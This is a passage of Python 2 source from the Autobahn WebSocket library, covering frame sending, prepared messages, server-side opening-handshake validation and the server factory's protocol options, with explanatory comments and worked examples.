self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
else:
if opcode not in [1, 2]:
raise Exception("use of reserved opcode %d" % opcode)
## remember opcode for later (when sending first frame)
##
self.send_message_opcode = opcode
self.send_state = WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN
def beginMessageFrame(self, length, reserved = 0, mask = None):
"""
Begin sending new message frame.
Modes: Hybi
:param length: Length of frame which is started. Must be >= 0 and <= 2^63.
:type length: int
      :param reserved: Reserved bits for frame (an integer from 0 to 7). Note that reserved != 0 is only legal when an extension has been negotiated which defines semantics.
:type reserved: int
:param mask: Optional frame mask. When given, this is used. When None and the peer is a client, a mask will be internally generated. For servers None is default.
:type mask: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state not in [WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN, WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE]:
raise Exception("WebSocketProtocol.beginMessageFrame invalid in current sending state")
if (not type(length) in [int, long]) or length < 0 or length > 0x7FFFFFFFFFFFFFFF: # 2**63
raise Exception("invalid value for message frame length")
if type(reserved) is not int or reserved < 0 or reserved > 7:
raise Exception("invalid value for reserved bits")
self.send_message_frame_length = length
if mask:
## explicit mask given
##
assert type(mask) == str
assert len(mask) == 4
self.send_message_frame_mask = mask
elif (not self.isServer and self.maskClientFrames) or (self.isServer and self.maskServerFrames):
## automatic mask:
## - client-to-server masking (if not deactivated)
## - server-to-client masking (if activated)
##
self.send_message_frame_mask = struct.pack("!I", random.getrandbits(32))
else:
## no mask
##
self.send_message_frame_mask = None
## payload masker
##
if self.send_message_frame_mask and length > 0 and self.applyMask:
if length < WebSocketProtocol.PAYLOAD_LEN_XOR_BREAKEVEN:
self.send_message_frame_masker = XorMaskerSimple(self.send_message_frame_mask)
else:
self.send_message_frame_masker = XorMaskerShifted1(self.send_message_frame_mask)
else:
self.send_message_frame_masker = XorMaskerNull()
## first byte
##
b0 = (reserved % 8) << 4 # FIN = false .. since with streaming, we don't know when message ends
if self.send_state == WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN:
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
b0 |= self.send_message_opcode % 128
else:
pass # message continuation frame
## second byte, payload len bytes and mask
##
b1 = 0
if self.send_message_frame_mask:
b1 |= 1 << 7
mv = self.send_message_frame_mask
else:
mv = ""
el = ""
if length <= 125:
b1 |= length
elif length <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", length)
elif length <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", length)
else:
raise Exception("invalid payload length")
## write message frame header
##
header = ''.join([chr(b0), chr(b1), el, mv])
self.sendData(header)
## now we are inside message frame ..
##
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE_FRAME
def sendMessageFrameData(self, payload, sync = False):
"""
Send out data when within message frame (message was begun, frame was begun).
Note that the frame is automatically ended when enough data has been sent
that is, there is no endMessageFrame, since you have begun the frame specifying
the frame length, which implicitly defined the frame end. This is different from
messages, which you begin and end, since a message can contain an unlimited number
of frames.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
:param payload: Data to send.
:returns: int -- Hybi mode: when the frame is still incomplete, returns the number of outstanding octets; when the frame is complete, returns <= 0, and when < 0, the absolute value is the amount of unconsumed data in the payload argument. Hixie mode: returns None.
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
if self.websocket_version == 0:
## Hixie Mode
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE:
raise Exception("WebSocketProtocol.sendMessageFrameData invalid in current sending state")
self.sendData(payload, sync = sync)
return None
else:
## Hybi Mode
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE_FRAME:
raise Exception("WebSocketProtocol.sendMessageFrameData invalid in current sending state")
rl = len(payload)
if self.send_message_frame_masker.pointer() + rl > self.send_message_frame_length:
l = self.send_message_frame_length - self.send_message_frame_masker.pointer()
rest = -(rl - l)
pl = payload[:l]
else:
l = rl
rest = self.send_message_frame_length - self.send_message_frame_masker.pointer() - l
pl = payload
## mask frame payload
##
plm = self.send_message_frame_masker.process(pl)
## send frame payload
##
self.sendData(plm, sync = sync)
## if we are done with frame, move back into "inside message" state
##
if self.send_message_frame_masker.pointer() >= self.send_message_frame_length:
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
## when =0 : frame was completed exactly
## when >0 : frame is still incomplete and this many octets are still needed to complete the frame
## when <0 : frame was completed and there was this much unconsumed data in payload argument
##
return rest
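## Sketch of interpreting the return value when pushing chunks into a frame
## (`chunks` is a hypothetical iterable of str, not part of the original code):
##
## for chunk in chunks:
## rest = self.sendMessageFrameData(chunk)
## if rest <= 0:
## break # frame complete; a negative value means part of `chunk` was not consumed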
def endMessage(self):
"""
End a previously begun message. No more frames may be sent (for that message). You have to
begin a new message before sending again.
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE:
raise Exception("WebSocketProtocol.endMessage invalid in current sending state [%d]" % self.send_state)
if self.websocket_version == 0:
self.sendData('\x00')
else:
self.sendFrame(opcode = 0, fin = True)
self.send_state = WebSocketProtocol.SEND_STATE_GROUND
def sendMessageFrame(self, payload, reserved = 0, mask = None, sync = False):
"""
When a message has begun, send a complete message frame in one go.
Modes: Hybi
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
self.beginMessageFrame(len(payload), reserved, mask)
self.sendMessageFrameData(payload, sync)
def sendMessage(self, payload, binary = False, payload_frag_size = None, sync = False):
"""
Send out a message in one go.
You can send a text or binary message, and optionally specify a payload fragment size.
When the latter is given, the payload will be split up into frames, each with
payload length <= the payload_frag_size given.
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
if self.websocket_version == 0:
if binary:
raise Exception("cannot send binary message in Hixie76 mode")
if payload_frag_size:
raise Exception("cannot fragment messages in Hixie76 mode")
self.sendMessageHixie76(payload, sync)
else:
self.sendMessageHybi(payload, binary, payload_frag_size, sync)
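## Usage sketch (illustrative values, not part of the original module): send a
## 1 MB text message and let the library fragment it into 64 kB frames.
##
## self.sendMessage("x" * 2**20, binary = False, payload_frag_size = 65536)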
def sendMessageHixie76(self, payload, sync = False):
"""
Hixie76-Variant of sendMessage().
Modes: Hixie
"""
self.sendData('\x00' + payload + '\xff', sync = sync)
def sendMessageHybi(self, payload, binary = False, payload_frag_size = None, sync = False):
"""
Hybi-Variant of sendMessage().
Modes: Hybi
"""
## (initial) frame opcode
##
if binary:
opcode = 2
else:
opcode = 1
## explicit payload_frag_size argument overrides autoFragmentSize setting
##
if payload_frag_size is not None:
pfs = payload_frag_size
else:
if self.autoFragmentSize > 0:
pfs = self.autoFragmentSize
else:
pfs = None
## send unfragmented
##
if pfs is None or len(payload) <= pfs:
self.sendFrame(opcode = opcode, payload = payload, sync = sync)
## send data message in fragments
##
else:
if pfs < 1:
raise Exception("payload fragment size must be at least 1 (was %d)" % pfs)
n = len(payload)
i = 0
done = False
first = True
while not done:
j = i + pfs
if j > n:
done = True
j = n
if first:
self.sendFrame(opcode = opcode, payload = payload[i:j], fin = done, sync = sync)
first = False
else:
self.sendFrame(opcode = 0, payload = payload[i:j], fin = done, sync = sync)
i += pfs
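## Worked example of the fragmentation loop above (illustrative numbers):
## a 10 octet payload with pfs = 4 is sent as three frames:
## frame 1: opcode = 1 (or 2 for binary), payload[0:4], fin = False
## frame 2: opcode = 0, payload[4:8], fin = False
## frame 3: opcode = 0, payload[8:10], fin = True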
class PreparedMessage:
"""
Encapsulates a prepared message to be sent later once or multiple
times. This is used for optimizing Broadcast/PubSub.
The message serialization formats currently created internally are:
* Hybi
* Hixie
The construction of different formats is needed, since we support
mixed clients (speaking different protocol versions).
It will also be the place to add a 3rd format, when we support
the deflate extension, since then, the clients will be mixed
between Hybi-Deflate-Unsupported, Hybi-Deflate-Supported and Hixie.
"""
def __init__(self, payload, binary, masked):
self.initHixie(payload, binary)
self.initHybi(payload, binary, masked)
def initHixie(self, payload, binary):
if binary:
# Hixie-76 cannot carry binary frames, so the payload is silently
# dropped here (an alternative would be to base64-encode it)
self.payloadHixie = ''
else:
self.payloadHixie = '\x00' + payload + '\xff'
def initHybi(self, payload, binary, masked):
l = len(payload)
## first byte
##
b0 = ((1 << 7) | 2) if binary else ((1 << 7) | 1)
## second byte, payload len bytes and mask
##
if masked:
b1 = 1 << 7
mask = struct.pack("!I", random.getrandbits(32))
if l == 0:
plm = payload
elif l < WebSocketProtocol.PAYLOAD_LEN_XOR_BREAKEVEN:
plm = XorMaskerSimple(mask).process(payload)
else:
plm = XorMaskerShifted1(mask).process(payload)
else:
b1 = 0
mask = ""
plm = payload
## payload extended length
##
el = ""
if l <= 125:
b1 |= l
elif l <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", l)
elif l <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", l)
else:
raise Exception("invalid payload length")
## raw WS message (single frame)
##
self.payloadHybi = ''.join([chr(b0), chr(b1), el, mask, plm])
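## Worked example of the framing above (unmasked, 5 octet text payload "hello"):
## b0 = 0x81 (FIN set, opcode 1), b1 = 0x05 (no mask bit, length 5), no
## extended length and no mask, so payloadHybi == '\x81\x05hello'.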
class WebSocketFactory:
"""
Mixin for WebSocketClientFactory and WebSocketServerFactory.
"""
def prepareMessage(self, payload, binary = False, masked = None):
"""
Prepare a WebSocket message. This can be later used on multiple
instances of WebSocketProtocol using sendPreparedMessage().
By doing so, you can avoid the (small) overhead of framing the
_same_ payload into WS messages when that payload is to be sent
out on multiple connections.
Modes: Hybi, Hixie
Caveats:
1) Only use when you know what you are doing, i.e. calling
sendPreparedMessage() on the _same_ protocol instance multiple
times with the same prepared message might break the spec,
since e.g. the frame mask will be the same!
2) Treat the object returned as opaque. It may change!
"""
if masked is None:
masked = not self.isServer
return PreparedMessage(payload, binary, masked)
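## Usage sketch (hypothetical names, not part of the original module): frame a
## payload once and push it to many connections via sendPreparedMessage()
## (see caveats above).
##
## msg = factory.prepareMessage("tick") # `factory` is a WebSocket server/client factory
## for proto in clients: # `clients`: hypothetical list of connected protocol instances
## proto.sendPreparedMessage(msg)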
class WebSocketServerProtocol(WebSocketProtocol):
"""
A Twisted protocol for WebSockets servers.
"""
def onConnect(self, connectionRequest):
"""
Callback fired during WebSocket opening handshake when new WebSocket client
connection is about to be established.
Throw HttpException when you don't want to accept the WebSocket
connection request. For example, throw a
HttpException(httpstatus.HTTP_STATUS_CODE_UNAUTHORIZED[0], "You are not authorized for this!").
When you want to accept the connection, return the accepted protocol
from the list of WebSocket (sub)protocols provided by the client, or None
to speak no specific one or when the client list was empty.
:param connectionRequest: WebSocket connection request information.
:type connectionRequest: instance of :class:`autobahn.websocket.ConnectionRequest`
"""
return None
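## Override sketch (hypothetical subclass; assumes ConnectionRequest exposes the
## client subprotocol list as `.protocols`, matching the constructor call in
## processHandshake() below):
##
## class MyServerProtocol(WebSocketServerProtocol):
## def onConnect(self, connectionRequest):
## if "chat" in connectionRequest.protocols:
## return "chat"
## raise HttpException(HTTP_STATUS_CODE_BAD_REQUEST[0], "subprotocol 'chat' required")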
def connectionMade(self):
"""
Called by Twisted when new TCP connection from client was accepted. Default
implementation will prepare for initial WebSocket opening handshake.
When overriding in derived class, make sure to call this base class
implementation _before_ your code.
"""
self.isServer = True
WebSocketProtocol.connectionMade(self)
self.factory.countConnections += 1
if self.debug:
log.msg("connection accepted from peer %s" % self.peerstr)
def connectionLost(self, reason):
"""
Called by Twisted when established TCP connection from client was lost. Default
implementation will tear down all state properly.
When overriding in derived class, make sure to call this base class
implementation _after_ your code.
"""
WebSocketProtocol.connectionLost(self, reason)
self.factory.countConnections -= 1
if self.debug:
log.msg("connection from %s lost" % self.peerstr)
def parseHixie76Key(self, key):
return int(filter(lambda x: x.isdigit(), key)) / key.count(" ")
def processHandshake(self):
"""
Process WebSockets opening handshake request from client.
"""
## only proceed when we have fully received the HTTP request line and all headers
##
end_of_header = self.data.find("\x0d\x0a\x0d\x0a")
if end_of_header >= 0:
self.http_request_data = self.data[:end_of_header + 4]
if self.debug:
log.msg("received HTTP request:\n\n%s\n\n" % self.http_request_data)
## extract HTTP status line and headers
##
(self.http_status_line, self.http_headers, http_headers_cnt) = parseHttpHeader(self.http_request_data)
## validate WebSocket opening handshake client request
##
if self.debug:
log.msg("received HTTP status line in opening handshake : %s" % str(self.http_status_line))
log.msg("received HTTP headers in opening handshake : %s" % str(self.http_headers))
## HTTP Request line : METHOD, VERSION
##
rl = self.http_status_line.split()
if len(rl) != 3:
return self.failHandshake("Bad HTTP request status line '%s'" % self.http_status_line)
if rl[0].strip() != "GET":
return self.failHandshake("HTTP method '%s' not allowed" % rl[0], HTTP_STATUS_CODE_METHOD_NOT_ALLOWED[0])
vs = rl[2].strip().split("/")
if len(vs) != 2 or vs[0] != "HTTP" or vs[1] not in ["1.1"]:
return self.failHandshake("Unsupported HTTP version '%s'" % rl[2], HTTP_STATUS_CODE_UNSUPPORTED_HTTP_VERSION[0])
## HTTP Request line : REQUEST-URI
##
self.http_request_uri = rl[1].strip()
try:
(scheme, netloc, path, params, query, fragment) = urlparse.urlparse(self.http_request_uri)
## FIXME: check that if absolute resource URI is given,
## the scheme/netloc matches the server
if scheme != "" or netloc != "":
pass
## Fragment identifiers are meaningless in the context of WebSocket
## URIs, and MUST NOT be used on these URIs.
if fragment != "":
return self.failHandshake("HTTP requested resource contains a fragment identifier '%s'" % fragment)
## resource path and query parameters .. this will get forwarded
## to onConnect()
self.http_request_path = path
self.http_request_params = urlparse.parse_qs(query)
except:
return self.failHandshake("Bad HTTP request resource - could not parse '%s'" % rl[1].strip())
## Host
##
if not self.http_headers.has_key("host"):
return self.failHandshake("HTTP Host header missing in opening handshake request")
if http_headers_cnt["host"] > 1:
return self.failHandshake("HTTP Host header appears more than once in opening handshake request")
self.http_request_host = self.http_headers["host"].strip()
if self.http_request_host.find(":") >= 0:
(h, p) = self.http_request_host.split(":")
try:
port = int(str(p.strip()))
except:
return self.failHandshake("invalid port '%s' in HTTP Host header '%s'" % (str(p.strip()), str(self.http_request_host)))
if port != self.factory.port:
return self.failHandshake("port %d in HTTP Host header '%s' does not match server listening port %s" % (port, str(self.http_request_host), self.factory.port))
self.http_request_host = h
else:
if not ((self.factory.isSecure and self.factory.port == 443) or (not self.factory.isSecure and self.factory.port == 80)):
return self.failHandshake("missing port in HTTP Host header '%s' and server runs on non-standard port %d (wss = %s)" % (str(self.http_request_host), self.factory.port, self.factory.isSecure))
## Upgrade
##
if not self.http_headers.has_key("upgrade"):
## When no WS upgrade, render HTML server status page
##
if self.webStatus:
self.sendServerStatus()
self.dropConnection(abort = False)
return
else:
return self.failHandshake("HTTP Upgrade header missing", HTTP_STATUS_CODE_UPGRADE_REQUIRED[0])
upgradeWebSocket = False
for u in self.http_headers["upgrade"].split(","):
if u.strip().lower() == "websocket":
upgradeWebSocket = True
break
if not upgradeWebSocket:
return self.failHandshake("HTTP Upgrade headers do not include 'websocket' value (case-insensitive) : %s" % self.http_headers["upgrade"])
## Connection
##
if not self.http_headers.has_key("connection"):
return self.failHandshake("HTTP Connection header missing")
connectionUpgrade = False
for c in self.http_headers["connection"].split(","):
if c.strip().lower() == "upgrade":
connectionUpgrade = True
break
if not connectionUpgrade:
return self.failHandshake("HTTP Connection headers do not include 'upgrade' value (case-insensitive) : %s" % self.http_headers["connection"])
## Sec-WebSocket-Version PLUS determine mode: Hybi or Hixie
##
if not self.http_headers.has_key("sec-websocket-version"):
if self.debugCodePaths:
log.msg("Hixie76 protocol detected")
if self.allowHixie76:
version = 0
else:
return self.failHandshake("WebSocket connection denied - Hixie76 protocol mode disabled.")
else:
if self.debugCodePaths:
log.msg("Hybi protocol detected")
if http_headers_cnt["sec-websocket-version"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Version header appears more than once in opening handshake request")
try:
version = int(self.http_headers["sec-websocket-version"])
except:
return self.failHandshake("could not parse HTTP Sec-WebSocket-Version header '%s' in opening handshake request" % self.http_headers["sec-websocket-version"])
if version not in self.versions:
## respond with list of supported versions (descending order)
##
sv = sorted(self.versions)
sv.reverse()
svs = ','.join([str(x) for x in sv])
return self.failHandshake("WebSocket version %d not supported (supported versions: %s)" % (version, svs),
HTTP_STATUS_CODE_BAD_REQUEST[0],
[("Sec-WebSocket-Version", svs)])
else:
## store the protocol version we are supposed to talk
self.websocket_version = version
## Sec-WebSocket-Protocol
##
if self.http_headers.has_key("sec-websocket-protocol"):
protocols = [str(x.strip()) for x in self.http_headers["sec-websocket-protocol"].split(",")]
# check for duplicates in protocol header
pp = {}
for p in protocols:
if pp.has_key(p):
return self.failHandshake("duplicate protocol '%s' specified in HTTP Sec-WebSocket-Protocol header" % p)
else:
pp[p] = 1
# ok, no duplicates, save list in order the client sent it
self.websocket_protocols = protocols
else:
self.websocket_protocols = []
## Origin / Sec-WebSocket-Origin
## http://tools.ietf.org/html/draft-ietf-websec-origin-02
##
if self.websocket_version < 13 and self.websocket_version != 0:
# Hybi, but only < Hybi-13
websocket_origin_header_key = 'sec-websocket-origin'
else:
# RFC6455, >= Hybi-13 and Hixie
websocket_origin_header_key = "origin"
self.websocket_origin = None
if self.http_headers.has_key(websocket_origin_header_key):
if http_headers_cnt[websocket_origin_header_key] > 1:
return self.failHandshake("HTTP Origin header appears more than once in opening handshake request")
self.websocket_origin = self.http_headers[websocket_origin_header_key].strip()
else:
# non-browser clients are allowed to omit this header
pass
## Sec-WebSocket-Extensions
##
## extensions requested by client
self.websocket_extensions = []
## extensions selected by server
self.websocket_extensions_in_use = []
if self.http_headers.has_key("sec-websocket-extensions"):
if self.websocket_version == 0:
return self.failHandshake("Sec-WebSocket-Extensions header specified for Hixie-76")
extensions = [x.strip() for x in self.http_headers["sec-websocket-extensions"].split(',')]
if len(extensions) > 0:
self.websocket_extensions = extensions
if self.debug:
log.msg("client requested extensions we don't support (%s)" % str(extensions))
## Sec-WebSocket-Key (Hybi) or Sec-WebSocket-Key1/Sec-WebSocket-Key2 (Hixie-76)
##
if self.websocket_version == 0:
for kk in ['Sec-WebSocket-Key1', 'Sec-WebSocket-Key2']:
k = kk.lower()
if not self.http_headers.has_key(k):
return self.failHandshake("HTTP %s header missing" % kk)
if http_headers_cnt[k] > 1:
return self.failHandshake("HTTP %s header appears more than once in opening handshake request" % kk)
try:
key1 = self.parseHixie76Key(self.http_headers["sec-websocket-key1"].strip())
key2 = self.parseHixie76Key(self.http_headers["sec-websocket-key2"].strip())
except:
return self.failHandshake("could not parse Sec-WebSocket-Key1/2")
else:
if not self.http_headers.has_key("sec-websocket-key"):
return self.failHandshake("HTTP Sec-WebSocket-Key header missing")
if http_headers_cnt["sec-websocket-key"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Key header appears more than once in opening handshake request")
key = self.http_headers["sec-websocket-key"].strip()
if len(key) != 24: # 16 bytes => (ceil(128/24)*24)/6 == 24
return self.failHandshake("bad Sec-WebSocket-Key (length must be 24 ASCII chars) '%s'" % key)
if key[-2:] != "==": # 24 - ceil(128/6) == 2
return self.failHandshake("bad Sec-WebSocket-Key (invalid base64 encoding) '%s'" % key)
for c in key[:-2]:
if c not in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/":
return self.failHandshake("bad character '%s' in Sec-WebSocket-Key (invalid base64 encoding) '%s'" (c, key))
## For Hixie-76, we need 8 octets of HTTP request body to complete HS!
##
if self.websocket_version == 0:
if len(self.data) < end_of_header + 4 + 8:
return
else:
key3 = self.data[end_of_header + 4:end_of_header + 4 + 8]
## Ok, got complete HS input, remember rest (if any)
##
if self.websocket_version == 0:
self.data = self.data[end_of_header + 4 + 8:]
else:
self.data = self.data[end_of_header + 4:]
## WebSocket handshake validated => produce opening handshake response
## Now fire onConnect() on derived class, to give that class a chance to accept or deny
## the connection. onConnect() may throw, in which case the connection is denied, or it
## may return a protocol from the protocols provided by client or None.
##
try:
connectionRequest = ConnectionRequest(self.peer,
self.peerstr,
self.http_headers,
self.http_request_host,
self.http_request_path,
self.http_request_params,
self.websocket_version,
self.websocket_origin,
self.websocket_protocols,
self.websocket_extensions)
## onConnect() will return the selected subprotocol or None
## or raise an HttpException
##
protocol = self.onConnect(connectionRequest)
if protocol is not None and not (protocol in self.websocket_protocols):
raise Exception("protocol accepted must be from the list client sent or None")
self.websocket_protocol_in_use = protocol
except HttpException, e:
return self.failHandshake(e.reason, e.code)
#return self.sendHttpRequestFailure(e.code, e.reason)
except Exception, e:
log.msg("Exception raised in onConnect() - %s" % str(e))
return self.failHandshake("Internal Server Error", HTTP_STATUS_CODE_INTERNAL_SERVER_ERROR[0])
## build response to complete WebSocket handshake
##
response = "HTTP/1.1 %d Switching Protocols\x0d\x0a" % HTTP_STATUS_CODE_SWITCHING_PROTOCOLS[0]
if self.factory.server is not None and self.factory.server != "":
response += "Server: %s\x0d\x0a" % self.factory.server.encode("utf-8")
response += "Upgrade: WebSocket\x0d\x0a"
response += "Connection: Upgrade\x0d\x0a"
if self.websocket_protocol_in_use is not None:
response += "Sec-WebSocket-Protocol: %s\x0d\x0a" % str(self.websocket_protocol_in_use)
if self.websocket_version == 0:
if self.websocket_origin:
## browser clients provide the header and expect it to be echoed back
response += "Sec-WebSocket-Origin: %s\x0d\x0a" % str(self.websocket_origin)
if self.debugCodePaths:
log.msg('factory isSecure = %s port = %s' % (self.factory.isSecure, self.factory.port))
if (self.factory.isSecure and self.factory.port != 443) or ((not self.factory.isSecure) and self.factory.port != 80):
if self.debugCodePaths:
log.msg('factory running on non-default port')
response_port = ':' + str(self.factory.port)
else:
if self.debugCodePaths:
log.msg('factory running on default port')
response_port = ''
## FIXME: check this! But see below ..
if False:
response_host = str(self.factory.host)
response_path = str(self.factory.path)
else:
response_host = str(self.http_request_host)
response_path = str(self.http_request_uri)
location = "%s://%s%s%s" % ('wss' if self.factory.isSecure else 'ws', response_host, response_port, response_path)
# Safari is very picky about this one
response += "Sec-WebSocket-Location: %s\x0d\x0a" % location
## end of HTTP response headers
response += "\x0d\x0a"
## compute accept body
##
accept_val = struct.pack(">II", key1, key2) + key3
accept = hashlib.md5(accept_val).digest()
response_body = str(accept)
else:
## compute Sec-WebSocket-Accept
##
sha1 = hashlib.sha1()
sha1.update(key + WebSocketProtocol.WS_MAGIC)
sec_websocket_accept = base64.b64encode(sha1.digest())
response += "Sec-WebSocket-Accept: %s\x0d\x0a" % sec_websocket_accept
if len(self.websocket_extensions_in_use) > 0:
response += "Sec-WebSocket-Extensions: %s\x0d\x0a" % ','.join(self.websocket_extensions_in_use)
## end of HTTP response headers
response += "\x0d\x0a"
response_body = ''
if self.debug:
log.msg("sending HTTP response:\n\n%s%s\n\n" % (response, binascii.b2a_hex(response_body)))
## save and send out opening HS data
##
self.http_response_data = response + response_body
self.sendData(self.http_response_data)
## opening handshake completed, move WebSockets connection into OPEN state
##
self.state = WebSocketProtocol.STATE_OPEN
self.inside_message = False
if self.websocket_version != 0:
self.current_frame = None
## fire handler on derived class
##
self.onOpen()
## process rest, if any
##
if len(self.data) > 0:
self.consumeData()
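## Worked example of the Sec-WebSocket-Accept computation above, using the
## sample key from RFC 6455 section 1.3 (WS_MAGIC is the GUID
## "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"):
##
## >>> import hashlib, base64
## >>> key = "dGhlIHNhbXBsZSBub25jZQ=="
## >>> base64.b64encode(hashlib.sha1(key + "258EAFA5-E914-47DA-95CA-C5AB0DC85B11").digest())
## 's3pPLMBiTxaQ9kYGzzhZRbK+xOo='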
def failHandshake(self, reason, code = HTTP_STATUS_CODE_BAD_REQUEST[0], responseHeaders = []):
"""
During opening handshake the client request was invalid, we send a HTTP
error response and then drop the connection.
"""
if self.debug:
log.msg("failing WebSockets opening handshake ('%s')" % reason)
self.sendHttpErrorResponse(code, reason, responseHeaders)
self.dropConnection(abort = False)
def sendHttpErrorResponse(self, code, reason, responseHeaders = []):
"""
Send out HTTP error response.
"""
response = "HTTP/1.1 %d %s\x0d\x0a" % (code, reason.encode("utf-8"))
for h in responseHeaders:
response += "%s: %s\x0d\x0a" % (h[0], h[1].encode("utf-8"))
response += "\x0d\x0a"
self.sendData(response)
def sendHtml(self, html):
raw = html.encode("utf-8")
response = "HTTP/1.1 %d %s\x0d\x0a" % (HTTP_STATUS_CODE_OK[0], HTTP_STATUS_CODE_OK[1])
if self.factory.server is not None and self.factory.server != "":
response += "Server: %s\x0d\x0a" % self.factory.server.encode("utf-8")
response += "Content-Type: text/html; charset=UTF-8\x0d\x0a"
response += "Content-Length: %d\x0d\x0a" % len(raw)
response += "\x0d\x0a"
response += raw
self.sendData(response)
def sendServerStatus(self):
"""
Used to send out server status/version upon receiving a HTTP/GET without
upgrade to WebSocket header (and option serverStatus is True).
"""
html = """
<!DOCTYPE html>
<html>
<body>
<h1>Autobahn WebSockets %s</h1>
<p>
I am not a Web server, but a WebSocket endpoint.
You can talk to me using the WebSocket <a href="http://tools.ietf.org/html/rfc6455">protocol</a>.
</p>
<p>
For more information, please visit <a href="http://autobahn.ws">my homepage</a>.
</p>
</body>
</html>
""" % str(autobahn.version)
self.sendHtml(html)
class WebSocketServerFactory(protocol.ServerFactory, WebSocketFactory):
"""
A Twisted factory for WebSockets server protocols.
"""
protocol = WebSocketServerProtocol
"""
The protocol to be spoken. Must be derived from :class:`autobahn.websocket.WebSocketServerProtocol`.
"""
def __init__(self,
## WebSocket session parameters
url = None,
protocols = [],
server = "AutobahnPython/%s" % autobahn.version,
## debugging
debug = False,
debugCodePaths = False):
"""
Create instance of WebSocket server factory.
Note that you MUST set URL either here or using setSessionParameters() _before_ the factory is started.
:param url: WebSocket listening URL - ("ws:" | "wss:") "//" host [ ":" port ] path [ "?" query ].
:type url: str
:param protocols: List of subprotocols the server supports. The subprotocol used is the first from the list of subprotocols announced by the client that is contained in this list.
:type protocols: list of strings
:param server: Server as announced in HTTP response header during opening handshake or None (default: "AutobahnPython/x.x.x").
:type server: str
:param debug: Debug mode (default: False).
:type debug: bool
:param debugCodePaths: Debug code paths mode (default: False).
:type debugCodePaths: bool
"""
self.debug = debug
self.debugCodePaths = debugCodePaths
self.logOctets = debug
self.logFrames = debug
self.isServer = True
## seed RNG which is used for WS frame masks generation
random.seed()
## default WS session parameters
##
self.setSessionParameters(url, protocols, server)
## default WebSocket protocol options
##
self.resetProtocolOptions()
## number of currently connected clients
##
self.countConnections = 0
def setSessionParameters(self, url = None, protocols = [], server = None):
"""
Set WebSocket session parameters.
:param url: WebSocket listening URL - ("ws:" | "wss:") "//" host [ ":" port ].
:type url: str
:param protocols: List of subprotocols the server supports. The subprotocol used is the first from the list of subprotocols announced by the client that is contained in this list.
:type protocols: list of strings
:param server: Server as announced in HTTP response header during opening handshake.
:type server: str
"""
if url is not None:
## parse WebSocket URI into components
(isSecure, host, port, resource, path, params) = parseWsUrl(url)
if path != "/":
raise Exception("path specified for server WebSocket URL")
if len(params) > 0:
raise Exception("query parameters specified for server WebSocket URL")
self.url = url
self.isSecure = isSecure
self.host = host
self.port = port
else:
self.url = None
self.isSecure = None
self.host = None
self.port = None
self.protocols = protocols
self.server = server
def resetProtocolOptions(self):
"""
Reset all WebSocket protocol options to defaults.
"""
self.versions = WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS
self.allowHixie76 = WebSocketProtocol.DEFAULT_ALLOW_HIXIE76
self.webStatus = True
self.utf8validateIncoming = True
self.requireMaskedClientFrames = True
self.maskServerFrames = False
self.applyMask = True
self.maxFramePayloadSize = 0
self.maxMessagePayloadSize = 0
self.autoFragmentSize = 0
self.failByDrop = True
self.echoCloseCodeReason = False
self.openHandshakeTimeout = 5
self.closeHandshakeTimeout = 1
self.tcpNoDelay = True
def setProtocolOptions(self,
versions = None,
allowHixie76 = None,
webStatus = None,
utf8validateIncoming = None,
maskServerFrames = None,
requireMaskedClientFrames = None,
applyMask = None,
maxFramePayloadSize = None,
maxMessagePayloadSize = None,
autoFragmentSize = None,
failByDrop = None,
echoCloseCodeReason = None,
openHandshakeTimeout = None,
closeHandshakeTimeout = None,
tcpNoDelay = None):
"""
Set WebSocket protocol options used as defaults for new protocol instances.
:param versions: The WebSockets protocol versions accepted by the server (default: WebSocketProtocol.SUPPORTED_PROTOCOL_VERSIONS).
:type versions: list of ints
:param allowHixie76: Allow the Hixie76 protocol version to be spoken.
:type allowHixie76: bool
:param webStatus: Return server status/version on HTTP/GET without WebSocket upgrade header (default: True).
:type webStatus: bool
:param utf8validateIncoming: Validate incoming UTF-8 in text message payloads (default: True).
:type utf8validateIncoming: bool
:param maskServerFrames: Mask server-to-client frames (default: False).
:type maskServerFrames: bool
:param requireMaskedClientFrames: Require client-to-server frames to be masked (default: True).
:type requireMaskedClientFrames: bool
:param applyMask: Actually apply mask to payload when a mask is present. Applies to outgoing and incoming frames (default: True).
:type applyMask: bool
:param maxFramePayloadSize: Maximum frame payload size that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxFramePayloadSize: int
:param maxMessagePayloadSize: Maximum message payload size (after reassembly of fragmented messages) that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxMessagePayloadSize: int
:param autoFragmentSize: Automatic fragmentation of outgoing data messages (when using the message-based API) into frames with payload length <= this size or 0 for no auto-fragmentation (default: 0).
